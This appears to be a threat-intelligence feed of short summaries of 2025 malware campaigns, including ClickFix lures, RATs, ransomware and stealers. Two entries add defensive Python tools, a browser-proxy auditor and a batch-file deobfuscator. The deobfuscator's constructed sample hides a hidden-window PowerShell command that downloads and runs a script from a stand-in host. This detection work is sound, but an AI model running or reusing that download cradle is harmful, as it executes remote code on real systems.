Elastic researchers have identified a surge in ClickFix-based social engineering campaigns throughout 2025. These campaigns leverage deceptive CAPTCHA verification pages to trick users into executing malicious PowerShell commands. They initiate a multi-stage infection chain that delivers a RAT and infostealer called ARECHCLIENT2, also known as SectopRAT. The infection begins when a user interacts with the fake CAPTCHA page, leading to the execution of the GHOSTPULSE loader. GHOSTPULSE employs DLL sideloading to evade detection and delivers an encrypted payload. It runs a .NET-based loader that disables Windows security checks, decrypts the embedded malware, and loads ARECHCLIENT2 directly into memory. ARECHCLIENT2 targets credentials, cryptocurrency wallets, and browser data, performs system reconnaissance, and establishes persistent remote access.
Source: https://www.elastic.co/security-labs/a-wretch-client
2025-06-20
AsyncRAT_Campaign
MEDIUM
Intel Source:
Halcyon
Intel Name:
AsyncRAT_Campaign
Date of Scan:
2025-06-20
Impact:
MEDIUM
Summary:
Researchers at Halcyon have identified a financially motivated cybercriminal group conducting a widespread phishing campaign leveraging commodity RATs such as AsyncRAT, XWorm and Remcos. The campaign has been active since early 2024 and targets organizations globally across all sectors. The attack starts with phishing emails linking to Dropbox-hosted ZIP files that initiate a multi-stage infection process involving .URL and .LNK files, obfuscated batch scripts, and Python-based loaders. The attackers use temporary TryCloudflare tunnels to deliver the final malware payloads. These tunnels allow them to bypass traditional network defenses by exploiting legitimate services to hide their activity. The malware uses Python scripts to run from memory and uncommon system folders to evade both EPP and EDR solutions. The threat actors appear to function as initial access brokers, potentially selling access or deploying ransomware.
Source: https://www.halcyon.ai/blog/asyncrat-campaign-continues-to-evade-endpoint-detection
2025-06-20
SERPENTINE_CLOUD_Campaign
MEDIUM
Intel Source:
Securonix Threat Lab
Intel Name:
SERPENTINE_CLOUD_Campaign
Date of Scan:
2025-06-20
Impact:
MEDIUM
Summary:
Researchers at Securonix have uncovered an ongoing campaign named SERPENTINE#CLOUD leveraging Cloudflare Tunnel to secretly deliver Python-based malware. The attack starts with phishing emails containing ZIP archives that include malicious .LNK shortcut files disguised as invoice-themed PDFs. When clicked, these shortcuts execute hidden scripts that connect to attacker-controlled Cloudflare domains using WebDAV to download additional malicious files. The infection chain proceeds through VBScript and batch files, eventually leading to Python-based loaders that execute malware directly in memory using Donut shellcode. The malware employs advanced obfuscation techniques, including character encoding, base64, and a Python binary packer called Kramer. The final payload includes RATs like AsyncRAT or RevengeRAT, which give attackers full control over compromised machines. The campaign has been observed targeting victims in the U.S., U.K., Germany, and other Western countries.
Source: https://www.securonix.com/blog/analyzing_serpentinecloud-threat-actors-abuse-cloudflare-tunnels-threat-research/
2025-06-19
BERT_Ransomware_Targets_Windows_and_Linux
MEDIUM
Intel Source:
The Raven File
Intel Name:
BERT_Ransomware_Targets_Windows_and_Linux
Date of Scan:
2025-06-19
Impact:
MEDIUM
Summary:
Researchers at The Raven File have identified a new ransomware operation, known as BERT, which has been active since at least mid-March 2025. The group, which employs double extortion tactics, initially targeted Windows systems but expanded its capabilities in May 2025 to include a Linux variant that shares an 80% codebase match with the notorious REvil ransomware. Gaining initial access via phishing, the attackers deploy a multi-stage attack chain beginning with a PowerShell script that disables system defenses, including Windows Defender, the firewall, and UAC. Once security controls are neutralized, the ransomware payload is downloaded from Russian-controlled infrastructure and executed. Victims are geographically diverse, with a focus on the Service and Manufacturing sectors in the US, UK, and Asia.
Source: https://theravenfile.com/2025/06/16/bert-ransomware/
2025-06-19
Chaos_RAT_Targets_Windows_and_Linux
LOW
Intel Source:
Polyswarm
Intel Name:
Chaos_RAT_Targets_Windows_and_Linux
Date of Scan:
2025-06-19
Impact:
LOW
Summary:
Researchers from Acronis have uncovered new variants of the Chaos RAT, which has evolved from an open-source project into a versatile, cross-platform malware threat. Active campaigns since June 2025 target both Windows and Linux systems via phishing emails containing malicious PDF files. These documents lure users into clicking embedded links, initiating a multi-stage infection chain that deploys the final RAT payload. The malware's objectives are financial gain through the deployment of cryptominers and data theft, leveraging capabilities including keylogging, screen capture, file exfiltration, and full remote command execution. Chaos RAT employs complex obfuscation and anti-analysis techniques, such as checking for virtualized environments, to evade detection and hinder reverse engineering. Its ability to compromise both major operating systems with a full suite of intrusive tools creates a significant risk of data breaches and system degradation for a broad range of organizations.
Source: https://blog.polyswarm.io/new-chaos-rat-variants-observed
2025-06-18
MySQL_RAT_Campaign
LOW
Intel Source:
ASEC
Intel Name:
MySQL_RAT_Campaign
Date of Scan:
2025-06-18
Impact:
LOW
Summary:
Researchers at ASEC have uncovered an ongoing campaign targeting improperly secured MySQL servers, primarily those operating on Windows systems. The attackers exploit exposed port 3306/TCP using brute-force and dictionary attacks to gain administrative access. Once compromised, they install various types of malware, including GhostRAT, XWorm, HpLoader, and User Defined Function (UDF) based files. The use of UDF DLLs allows attackers to execute commands, download files, and load malware directly into memory. GhostRAT variants like GhostCringe and HiddenGh0st are capable of privilege escalation and screen capture, while XWorm, a modified remote access tool, can steal credentials, spread through USB devices, and capture clipboard data. The attackers have also used legitimate tools like Zoho ManageEngine agents to maintain access without using traditional backdoors.
Source: https://asec.ahnlab.com/ko/88468/
2025-06-18
Qilin_RaaS_Fills_Ransomware_Power_Vacuum
MEDIUM
Intel Source:
Cybereason
Intel Name:
Qilin_RaaS_Fills_Ransomware_Power_Vacuum
Date of Scan:
2025-06-18
Impact:
MEDIUM
Summary:
Researchers from Cybereason have observed the Qilin ransomware-as-a-service (RaaS) operation emerging to fill a power vacuum created by the collapse of other major ransomware groups in early 2025. Qilin has been active since late 2022 but is rapidly gaining dominance by offering a sophisticated, full-service cybercrime platform to its affiliates. The operation uses cross-platform malware written in Rust for Windows and C for Linux to target a wide range of systems, with a specific focus on enterprise virtualization environments like VMware ESXi and Nutanix. Attackers gain initial access, then use tools like PsExec for lateral movement, abuse PowerShell for privilege escalation, and execute scripts to disable hypervisor functions, terminate virtual machines, and delete backups before encrypting data.
Source: https://www.cybereason.com/blog/threat-alert-qilin-seizes-control
2025-06-17
Kimsuky_Targets_Academics_via_Phishing_Campaign
MEDIUM
Intel Source:
ASEC
Intel Name:
Kimsuky_Targets_Academics_via_Phishing_Campaign
Date of Scan:
2025-06-17
Impact:
MEDIUM
Summary:
ASEC researchers have uncovered a new phishing campaign by the North Korean state-sponsored group Kimsuky, targeting professionals by impersonating thesis reviewers. The attackers send phishing emails containing malicious password-protected Hangul Word Processor (HWP) documents. When the victim opens the file and enables content, it drops multiple files into the system's temporary directory, including a BAT script that initiates a multi-stage infection process. This process installs a PowerShell script that collects system and antivirus data, exfiltrates the data to a Dropbox account controlled by the attackers, and downloads additional payloads. The malware also abuses the legitimate remote access software AnyDesk by replacing its configuration files with attacker-controlled versions, effectively hiding all visual signs such as tray icons and windows. Additionally, the attackers leverage scheduled task abuse, encoded payloads, and a step-by-step method to stay hidden and maintain access.
Source: https://asec.ahnlab.com/ko/88419/
2025-06-17
Go_Based_SSH_Botnet_Targets_Linux_Systems
LOW
Intel Source:
ISC.SANS
Intel Name:
Go_Based_SSH_Botnet_Targets_Linux_Systems
Date of Scan:
2025-06-17
Impact:
LOW
Summary:
Researchers at ISC.SANS have identified a global, automated attack campaign targeting internet-exposed Linux systems with weak SSH credentials. The threat actor, utilizing a Go-based tool, brute-forces access and executes a multi-stage infection to establish persistent control. Observed on April 29, 2025, the attack involves deploying architecture-specific malware variants for ARM and x86 systems, indicating a clear focus on compromising a wide range of devices, including the Internet of Things (IoT) ecosystem. After gaining initial access, the attacker installs an SSH key backdoor and uses the chattr command to make the authorized_keys file immutable, significantly hindering remediation efforts.
Source: https://isc.sans.edu/diary/rss/32024
2025-06-16
Mirai_Variant_Exploits_DVRs_via_CVE_2024_3721
LOW
Intel Source:
Securelist
Intel Name:
Mirai_Variant_Exploits_DVRs_via_CVE_2024_3721
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers from Securelist have observed a new Mirai botnet variant actively exploiting a remote code execution vulnerability (CVE-2024-3721) in internet-exposed TBK DVR devices. The campaign uses a crafted POST request to download and execute a malicious ARM32 binary, immediately compromising the device without reconnaissance. The malware is a Mirai variant enhanced with anti-evasion features, including RC4-encrypted strings and checks to detect virtualization and emulation environments.
Source: https://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/
2025-06-16
Mamba2FA_Credential_Harvesting_Campaign
LOW
Intel Source:
Spider Labs
Intel Name:
Mamba2FA_Credential_Harvesting_Campaign
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers at SpiderLabs have identified an active phishing campaign leveraging a Phishing-as-a-Service (PhaaS) kit known as Mamba2FA. The attack begins with a lure themed as a "Secure Document Portal," designed to trick victims into entering their email address to access a purported document. Upon submission, the user is redirected to a counterfeit Microsoft login page for credential harvesting. The use of a PhishKit and PhaaS infrastructure indicates a commoditized and scalable threat, enabling less-skilled actors to deploy effective attacks.
Source: https://x.com/SpiderLabs/status/1932844577355939890
2025-06-16
Spectra_Ransomware_Double_Extortion
MEDIUM
Intel Source:
K7 Labs
Intel Name:
Spectra_Ransomware_Double_Extortion
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Researchers from K7 Security Labs have observed Spectra Ransomware, an emerging double-extortion threat targeting Windows-based systems. Attackers demand a $5,000 Bitcoin payment within a 72-hour deadline, threatening to leak stolen data if victims do not comply. The malware achieves persistence by creating a Run registry key and masquerading as svchost.exe in the AppData folder.
Source: https://labs.k7computing.com/index.php/the-spectre-of-spectraransomware/
2025-06-16
Fileless_AsyncRAT_via_Clickfix_Lure
LOW
Intel Source:
cloudsek
Intel Name:
Fileless_AsyncRAT_via_Clickfix_Lure
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers at CloudSEK have identified an active fileless malware campaign distributing AsyncRAT to German-speaking users. The attack, ongoing since at least April 2025, begins with a Clickfix-themed website that socially engineers victims into executing a malicious PowerShell command through a fake CAPTCHA prompt. The initial command downloads a second-stage, obfuscated PowerShell script, which then decodes and reflectively loads a C# AsyncRAT payload directly into memory, evading file-based detection. The malware leverages legitimate system utilities like conhost.exe and PowerShell for stealthy execution, establishes persistence via RunOnce registry keys, and communicates with a command-and-control server over TCP port 4444.
Source: https://www.cloudsek.com/blog/fileless-asyncrat-distributed-via-clickfix-technique-targeting-german-speaking-users
2025-06-16
Katz_Stealer
LOW
Intel Source:
Picussecurity
Intel Name:
Katz_Stealer
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers from Picus have uncovered Katz Stealer, a new information-stealing malware-as-a-service (MaaS) offering that emerged in 2025. The malware is distributed via phishing campaigns and trojanized software. It leverages a multi-stage infection chain that includes obfuscated JavaScript droppers, PowerShell loaders, and .NET-based UAC bypass techniques. The malware runs entirely in memory, hides inside legitimate Windows processes, and uses images to secretly run malicious code. Once inside the system, it targets web browsers like Chrome and Firefox, email accounts, VPN services, file transfer programs, and cryptocurrency wallets. Additionally, it takes control of Discord by injecting malicious code that runs every time the app starts, giving attackers remote access to the system.
Source: https://www.picussecurity.com/resource/blog/understanding-katz-stealer-malware-and-its-credential-theft-capabilities
2025-06-16
APT41_Uses_Google_Calendar_for_C2
MEDIUM
Intel Source:
Resecurity
Intel Name:
APT41_Uses_Google_Calendar_for_C2
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Researchers from Resecurity have uncovered that the Chinese state-sponsored threat actor APT41, which is involved in both espionage and cybercrime, has launched a new campaign leveraging Google Calendar as a covert C2 channel. The threat actor gains initial access through spear phishing emails containing a ZIP archive disguised as export documentation, which includes malicious LNK files and decoy images. Upon execution, a series of malware components (PLUSDROP, PLUSINJECT, and TOUGHPROGRESS) activate and run directly in memory, using process hollowing and hiding inside legitimate system processes to avoid detection. The final payload, TOUGHPROGRESS, communicates with attacker-controlled Google Calendar events to receive commands and sends stolen data back by writing it into new calendar entries. This malware is highly advanced and capable of altering the Windows operating system, which could allow the attackers to take full control of the system and erase traces of their activity.
Source: https://www.resecurity.com/blog/article/apt-41-threat-intelligence-report-and-malware-analysis
2025-06-16
Hive0131_Targets_Latin_America
MEDIUM
Intel Source:
IBM X-Force
Intel Name:
Hive0131_Targets_Latin_America
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Researchers at IBM X-Force have identified a surge in cyber-attacks involving DCRat across Latin America. These attacks are attributed to the financially motivated threat group Hive0131. The group sends phishing emails impersonating Colombian judicial entities to trick recipients into clicking malicious links embedded in PDFs and Google Docs, initiating the infection chain. These phishing campaigns deliver DCRat, a Malware-as-a-Service (MaaS) tool, via obfuscated loaders such as VMDetectLoader, which employs virtual machine detection, AMSI bypass, and process hollowing to evade detection. The malware is capable of surveillance, data exfiltration, command execution, and persistence through scheduled tasks or registry keys. Researchers also observed that the attackers use various methods, such as JavaScript and VBScript, to distribute the malware. Hive0131 appears to have shifted from traditional RATs like QuasarRAT and NjRAT to more advanced payloads like DCRat, which makes detection and removal more difficult.
Source: https://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america
2025-06-16
Anubis_RaaS_Group
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Anubis_RaaS_Group
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Trend Micro researchers have discovered a new ransomware strain called Anubis, which operates as a ransomware-as-a-service (RaaS) operation active since December 2024. It includes a file-wiping feature alongside traditional encryption, creating a dual-threat approach that puts extra pressure on victims to pay the ransom. Anubis affiliates gain access through spear-phishing campaigns and leverage advanced techniques such as privilege escalation, access token manipulation, and shadow copy deletion to prevent recovery. Anubis has targeted organizations in various sectors, especially healthcare and construction, with confirmed attacks in countries including Australia, Canada, Peru, and the U.S. The group operates on cybercrime forums such as RAMP and XSS, offering flexible affiliate programs to other cybercriminal groups.
Source: https://www.trendmicro.com/en_us/research/25/f/anubis-a-closer-look-at-an-emerging-ransomware.html
2025-06-16
ClickFix_Social_Engineering_Attack_Chain
LOW
Intel Source:
Darktrace
Intel Name:
ClickFix_Social_Engineering_Attack_Chain
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers from Darktrace have observed threat actors, including APT groups like APT28 and MuddyWater, leveraging a social engineering tactic dubbed "ClickFix" to gain initial access and exfiltrate data from organizations. This prolific campaign, observed in early 2025 across EMEA and the United States, targets the human user as the weakest link through phishing or malvertising that directs victims to a fake prompt, such as a CAPTCHA or error message. These prompts trick users into manually executing a malicious PowerShell command, which establishes command and control (C2) communication. This allows attackers to download secondary payloads like XWorm or Lumma, move laterally, and exfiltrate sensitive system information.
Source: https://www.darktrace.com/blog/unpacking-clickfix-darktraces-detection-of-a-prolific-social-engineering-tactic
2025-06-16
Water_Curse_GitHub_Malware_Campaign
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Water_Curse_GitHub_Malware_Campaign
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Researchers from Trend Micro have uncovered a broad supply chain campaign conducted by a financially motivated threat actor tracked as Water Curse, targeting developers, security professionals, and gamers. The actor leverages at least 76 weaponized GitHub repositories to deliver multistage malware. The initial attack vector involves tricking users into downloading and compiling seemingly legitimate open-source tools, where malicious code embedded in Visual Studio project files executes during the build process. This initiates a complex infection chain using VBS and PowerShell scripts to deploy an Electron-based backdoor, which performs privilege escalation through UAC bypass, establishes persistence via scheduled tasks, and disables security defenses like Windows Defender and Volume Shadow Copies.
Source: https://www.trendmicro.com/en_us/research/25/f/water-curse.html
2025-06-12
Fog_Ransomware_Employs_Unusual_Toolset
MEDIUM
Intel Source:
Symantec
Intel Name:
Fog_Ransomware_Employs_Unusual_Toolset
Date of Scan:
2025-06-12
Impact:
MEDIUM
Summary:
Symantec researchers have reported an attack against a financial institution in Asia involving the Fog ransomware. The operators demonstrated an unusual methodology, blending ransomware deployment with espionage-style tactics. After an approximate two-week dwell time, the attackers deployed a unique toolset including the legitimate employee monitoring software Syteca for spying, and open-source C2 frameworks like GC2 and Adaptix for command and control. Notably, the threat actors established persistence via a new service after deploying the ransomware, a clear deviation from typical smash-and-grab ransomware behavior. This post-encryption activity suggests a dual motive: the ransomware may have been a decoy for a more persistent espionage operation, or an opportunistic monetization of an existing intrusion.
Source: https://www.security.com/threat-intelligence/fog-ransomware-attack
2025-06-12
DCRat_Targeting_Blockchain_Users
LOW
+
Intel Source:
Qi'anxin Threat Intelligence Center
Intel Name:
DCRat_Targeting_Blockchain_Users
Date of Scan:
2025-06-12
Impact:
LOW
Summary:
Qi'anxin Threat Intelligence Center and the Skyrocket Falcon team have identified a financially motivated campaign targeting blockchain and cryptocurrency users. Unknown attackers deliver a malicious ZIP archive containing a shortcut file (LNK) via the Telegram messaging application. Execution of the lure file initiates a multi-stage infection process that uses VBScript and PowerShell to download components from cloud storage. The attack leverages DLL side-loading, using legitimately signed executables to load a malicious DLL, which then loads and injects the DCRat remote access trojan (RAT) into memory. This methodology is designed to evade detection by traditional security tools. The attackers' infrastructure also hosts fraudulent cryptocurrency investment websites, indicating the primary objective is theft.
Source: https://ti.qianxin.com/blog/articles/counterfeiting-qianxin-certificates-targeted-attacks-against-blockchain-customers-en/
2025-06-12
Italian_Remcos_Malware_Campaign
MEDIUM
+
Intel Source:
CERT-AGID
Intel Name:
Italian_Remcos_Malware_Campaign
Date of Scan:
2025-06-12
Impact:
MEDIUM
Summary:
Researchers at CERT-AGID have identified a malware campaign targeting Italy, active around June 10-11, 2025. Threat actors are distributing the Remcos Remote Access Trojan (RAT) via email, using malicious ZIP file attachments. The campaign leverages a financial lure with an email subject of "AV: Avviso di pagamento" (Payment notice) to trick recipients into executing the payload. The use of the "ModiLoader" tag suggests a potential multi-stage infection chain. The primary motivation appears to be financial, using the RAT's capabilities for credential theft, data exfiltration, and full remote control of compromised systems.
Source: https://cert-agid.gov.it/wp-content/uploads/2025/06/remcos-11-06-2025.json
2025-06-12
Arkana_Ransomware_Exfiltrates_Brokerage_Data
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Arkana_Ransomware_Exfiltrates_Brokerage_Data
Date of Scan:
2025-06-12
Impact:
MEDIUM
Summary:
Researchers from ASEC have observed the Arkana ransomware group claiming responsibility for a significant data breach targeting a UK-based global online brokerage firm. The group exfiltrated approximately 50 GB of data, including sensitive Know Your Customer (KYC) records and customer information, and threatened to leak or sell the dataset if a ransom was not paid by June 10, 2025. This double-extortion attack, publicized on the group's dedicated leak site, was focused on monetizing the stolen information. The incident highlights a severe threat to the financial sector, where exfiltrated KYC data presents a high risk of identity theft and fraud.
Source: https://asec.ahnlab.com/en/88437/
2025-06-12
Winos_4_0_Behind_Operation_Holding_Hands
MEDIUM
+
Intel Source:
somedieyoungZZ
Intel Name:
Winos_4_0_Behind_Operation_Holding_Hands
Date of Scan:
2025-06-12
Impact:
MEDIUM
Summary:
Researcher somedieyoungZZ has detailed the 'Operation Holding Hands' campaign, a multi-stage attack attributed to the China-linked Silver Fox APT group. Targeting users in Japan and Taiwan, the campaign begins with a phishing lure: a digitally signed executable masquerading as a salary revision notice. This initial payload leverages its stolen certificate to appear legitimate while it drops and unpacks subsequent stages using COM objects. The malware employs sophisticated evasion techniques, including DLL search order hijacking and dynamic API resolution via configuration files, to minimize its forensic footprint. The final payload is a memory-resident backdoor, identified as Winos 4.0, which connects to hardcoded C2 infrastructure for persistent access and espionage.
Source: https://somedieyoungzz.github.io/posts/silver-fox/
2025-06-12
BrowserVenom_Spreads_Via_Fake_AI_Download_Ads
LOW
+
Intel Source:
Securelist
Intel Name:
BrowserVenom_Spreads_Via_Fake_AI_Download_Ads
Date of Scan:
2025-06-12
Impact:
LOW
Summary:
Researchers from Securelist have identified a malware campaign that exploits interest in the DeepSeek-R1 LLM to distribute an implant dubbed BrowserVenom. The threat actors, believed to be Russian-speaking based on code comments, use malicious online ads to redirect people searching for DeepSeek-R1 to a fake site that delivers a trojanized installer named AI_Launcher_1.21.exe. When executed, the file starts a multi-stage infection process involving fake CAPTCHA screens and PowerShell-based defense evasion, then downloads and installs the final payload, BrowserVenom, which installs a malicious certificate and silently changes the settings of all major web browsers so that their traffic is routed through an attacker-controlled proxy. The campaign has been observed in Brazil, Cuba, Mexico, India, Nepal, South Africa and Egypt, showing a wide geographical distribution.
Source: https://securelist.com/browservenom-mimicks-deepseek-to-use-malicious-proxy/115728/
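An implant that forces browser traffic through its own proxy has to leave that configuration somewhere a defender can read back. The check below is an added example for this feed, not Securelist's code, and it does not claim to reproduce the exact files BrowserVenom touches; it audits two generic places a browser-level proxy can be forced: Firefox preference files (user.js/prefs.js, where network.proxy.* lives) and Chromium-family command lines (where --proxy-server and certificate-check switches can be appended to a shortcut). The sample preference file, the command line and the 203.0.113.10 address are constructed for the demonstration.

```python
import re
from pathlib import Path

# One Firefox preference per line: user_pref("name", value);  (prefs.js uses the same shape)
PREF_LINE = re.compile(r'^\s*(?:user_)?pref\(\s*"([^"]+)"\s*,\s*(.+?)\s*\);\s*$')

# Chromium-family switches that reroute traffic or weaken certificate validation.
CHROMIUM_FLAGS = {
    "--proxy-server", "--proxy-pac-url", "--host-rules",
    "--ignore-certificate-errors", "--ignore-certificate-errors-spki-list",
}
SWITCH = re.compile(r'(--[a-z][a-z0-9-]*)(?:=("[^"]*"|\S+))?')


def parse_firefox_prefs(text):
    """Map preference name -> raw value (quotes stripped) for every pref line."""
    prefs = {}
    for line in text.splitlines():
        m = PREF_LINE.match(line)
        if m:
            prefs[m.group(1)] = m.group(2).strip('"')
    return prefs


def audit_firefox_prefs(text):
    """Return human-readable findings for proxy or trust changes in a Firefox profile."""
    prefs = parse_firefox_prefs(text)
    findings = []
    ptype = prefs.get("network.proxy.type")
    if ptype == "1":  # manual proxy configuration
        for scheme in ("http", "ssl", "socks"):
            host = prefs.get(f"network.proxy.{scheme}")
            if host:
                port = prefs.get(f"network.proxy.{scheme}_port", "?")
                findings.append(f"network.proxy.{scheme}={host}:{port}")
    elif ptype == "2" and prefs.get("network.proxy.autoconfig_url"):  # PAC file
        findings.append(f"network.proxy.autoconfig_url={prefs['network.proxy.autoconfig_url']}")
    if prefs.get("security.enterprise_roots.enabled") == "true":
        # With this pref on, Firefox trusts roots from the OS certificate store, so a root
        # planted there by an implant also intercepts Firefox traffic. Review the OS store.
        findings.append("security.enterprise_roots.enabled=true (OS certificate store is trusted)")
    return findings


def audit_chromium_cmdline(cmdline):
    """Return (switch, value) pairs from a browser command line that deserve a look."""
    return [
        (sw, (val or "").strip('"') or None)
        for sw, val in SWITCH.findall(cmdline)
        if sw in CHROMIUM_FLAGS
    ]


def audit_firefox_profiles(home=None):
    """Walk the usual Firefox profile locations under a home directory (assumed layout)."""
    home = Path(home) if home else Path.home()
    report = {}
    for pattern in ("AppData/Roaming/Mozilla/Firefox/Profiles/*/user.js",
                    "AppData/Roaming/Mozilla/Firefox/Profiles/*/prefs.js",
                    ".mozilla/firefox/*/user.js", ".mozilla/firefox/*/prefs.js"):
        for path in home.glob(pattern):
            found = audit_firefox_prefs(path.read_text(errors="replace"))
            if found:
                report[str(path)] = found
    return report


# Constructed samples: a user.js that pins HTTP and TLS traffic to one proxy, and a
# Chrome command line (as seen in a shortcut target or a process-creation event).
SAMPLE_USER_JS = """\
user_pref("network.proxy.type", 1);
user_pref("network.proxy.http", "203.0.113.10");
user_pref("network.proxy.http_port", 3128);
user_pref("network.proxy.ssl", "203.0.113.10");
user_pref("network.proxy.ssl_port", 3128);
user_pref("network.proxy.no_proxies_on", "");
user_pref("security.enterprise_roots.enabled", true);
"""
SAMPLE_CMDLINE = (r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                  r'--proxy-server="http://203.0.113.10:3128" --ignore-certificate-errors '
                  r'--profile-directory=Default')

if __name__ == "__main__":
    for finding in audit_firefox_prefs(SAMPLE_USER_JS):
        print("firefox:", finding)
    for switch, value in audit_chromium_cmdline(SAMPLE_CMDLINE):
        print("chromium:", switch, value or "")
    for path, found in audit_firefox_profiles().items():
        print(path, found)
```

On a suspect Windows host, feed audit_chromium_cmdline the Target field of every browser shortcut on the desktop and taskbar and the command lines of running browser processes; a --proxy-server pointing at an address the organisation does not own, combined with a recently added root certificate, is the footprint this kind of implant cannot avoid leaving.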
2025-06-12
Quasar_RAT_via_Obfuscated_Batch_Files
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Quasar_RAT_via_Obfuscated_Batch_Files
Date of Scan:
2025-06-12
Impact:
LOW
Summary:
Researchers at ISC.SANS have identified an active campaign delivering the Quasar Remote Access Trojan (RAT) through a multi-stage infection process. Threat actors initiate the attack with a simple batch script that opens a decoy document to deceive the user while concurrently using PowerShell to download and execute a second, heavily obfuscated batch file.
Source: https://isc.sans.edu/diary/rss/32036
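Batch-file obfuscation of the kind used to hide a second-stage loader usually rests on two cmd.exe features: caret escapes (s^t^a^r^t is parsed as start) and percent-expansion of environment variables with substring syntax (%var:~start,len%), which lets a script assemble a command letter by letter from innocuous-looking set statements. The deobfuscator below is an added example for this feed, not ISC's tooling, and it makes no claim about the specific scheme in the Quasar sample; it resolves those two constructs statically, in cmd.exe order (percent expansion first, then caret removal), without ever executing the script. The sample batch file and the example.invalid URL are constructed.

```python
import re
import sys

SET_QUOTED = re.compile(r'^\s*set\s+"([^=]+)=(.*)"\s*$', re.IGNORECASE)   # set "name=value"
SET_PLAIN = re.compile(r'^\s*set\s+([^=\s]+)=(.*)$', re.IGNORECASE)       # set name=value
# %name%, %name:~start% or %name:~start,len% (start/len may be negative, as in cmd.exe)
REF = re.compile(r'%([A-Za-z_][A-Za-z0-9_]*)(?::~(-?\d+)(?:,(-?\d+))?)?%')


def _substr(value, start, length):
    """Apply cmd.exe substring rules: negative start counts from the end,
    negative length drops that many characters from the end."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if length is None:
        return value[start:]
    if length < 0:
        end = n + length
        return value[start:end] if end > start else ""
    return value[start:start + length]


def expand(line, env):
    """Percent-expand a line against known variables until it stops changing.
    References to unknown variables (e.g. %TEMP%) are left in place."""
    def repl(m):
        name, start, length = m.group(1).lower(), m.group(2), m.group(3)
        if name not in env:
            return m.group(0)
        if start is None:
            return env[name]
        return _substr(env[name], int(start), int(length) if length is not None else None)

    prev = None
    while prev != line:
        prev, line = line, REF.sub(repl, line)
    return line


def deobfuscate(script):
    """Return the commands a batch script would run once its set/substring/caret
    tricks are resolved. set lines are consumed into the environment."""
    env = {}
    commands = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.lower().startswith(("@echo", "rem ", "::")):
            continue
        m = SET_QUOTED.match(line) or SET_PLAIN.match(line)
        if m:
            env[m.group(1).strip().lower()] = expand(m.group(2), env)
            continue
        expanded = expand(line, env)
        commands.append(re.sub(r"\^(.)", r"\1", expanded))  # caret phase: ^x -> x
    return commands


# Constructed sample: "powershell" is spelled from every other character of %a%,
# the flags and the download cradle live in whole variables, and "start" is caret-split.
SAMPLE_BAT = r"""@echo off
set "a=p0o1w2e3r4s5h6e7l8l9"
set "b= -w hidden -ep bypass -c "
set c=IEX(New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')
s^t^a^r^t /b %a:~0,1%%a:~2,1%%a:~4,1%%a:~6,1%%a:~8,1%%a:~10,1%%a:~12,1%%a:~14,1%%a:~16,1%%a:~-2,1%%b%%c%
"""

if __name__ == "__main__":
    # Usage: python debat.py <file.bat>; with no argument the constructed sample is used.
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_BAT
    for cmd in deobfuscate(text):
        print(cmd)
```

The resolver deliberately stops short of cmd.exe's full grammar (no delayed !var! expansion, no for-loops, no call-level double expansion), which is the point: those are the next tricks to expect when this output still looks opaque, and a hit on a downloader or on -ep bypass in the resolved command line is what to pivot on.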
2025-06-11
CYBEREYE_RAT
LOW
+
Intel Source:
Cyfirma
Intel Name:
CYBEREYE_RAT
Date of Scan:
2025-06-11
Impact:
LOW
Summary:
Cyfirma researchers have identified a new .NET-based malware called CyberEye, also known as TelegramRAT, which is actively distributed through a GitHub repository and Telegram channels operated by threat actors using the aliases @cisamu123 and @CodQu. The malware is generated by a GUI-based builder that enables low-skill cybercriminals to produce customized payloads with features such as keylogging, credential theft, clipboard hijacking and persistence mechanisms. CyberEye uses Telegram as its command-and-control channel, so the operators do not need to set up their own servers. It disables Windows Defender through system settings and PowerShell commands and attempts to elevate its privileges. It steals saved passwords from browsers and session data from applications such as Telegram, Discord and Steam, and sends sensitive files and screenshots back to the attacker.
Source: https://www.cyfirma.com/research/understanding-cybereye-rat-builder-capabilities-and-implications/